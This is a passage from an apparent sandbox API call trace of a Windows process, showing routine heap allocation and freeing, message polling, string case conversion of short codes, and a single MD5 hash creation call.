Flags=0x0, Size=0x10) returned 0x34aab20 [0249.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0249.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0249.995] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0249.995] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0249.995] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0249.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0249.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0249.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0249.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0249.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0249.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0249.995] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0249.995] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0249.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0249.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0249.995] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0249.995] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0249.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0249.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0249.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0249.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0249.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0249.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0249.996] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0249.996] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0249.996] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0249.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0249.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0249.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0249.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0249.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0249.996] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0249.996] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0249.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0249.996] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0249.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0249.996] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0249.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0249.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0249.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0249.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0249.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0249.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0249.997] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0249.997] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0249.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0249.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0249.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0249.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0249.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0249.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0249.997] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0249.997] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0249.997] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0249.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0249.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0249.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0249.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0249.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0249.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0249.997] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0249.997] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0249.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0249.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0249.998] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0249.998] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0249.998] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0249.998] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0249.998] CryptCreateHash (in: hProv=0xad2720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0249.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0249.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0249.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0249.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0249.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0249.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0249.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0249.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0249.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0249.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0249.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0249.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0249.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0249.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0249.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0249.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0249.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0249.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0249.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0250.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0250.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0250.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0250.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0250.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0250.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0250.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0250.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0250.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0250.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0250.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0250.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0250.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0250.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0250.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0250.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0250.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0250.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0250.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0250.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0250.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0250.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0250.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0250.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0250.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0250.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0250.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0250.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0250.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0250.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0250.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0250.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0250.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0250.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0250.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0250.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0250.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0250.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0250.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0250.003] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0250.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0250.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0250.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0250.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0250.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0250.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0250.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0250.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0250.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0250.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0250.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0250.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0250.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0250.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0250.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0250.004] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0250.004] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0250.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0250.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0250.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0250.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0250.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0250.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0250.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0250.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0250.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0250.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0250.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0250.005] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0250.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0250.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0250.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0250.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0250.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0250.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0250.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0250.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0250.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0250.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0250.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b1c08 [0250.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0250.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0250.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0250.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0250.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x24b1828, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0250.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0250.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0250.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0250.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0250.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0250.006] HeapFree (in: 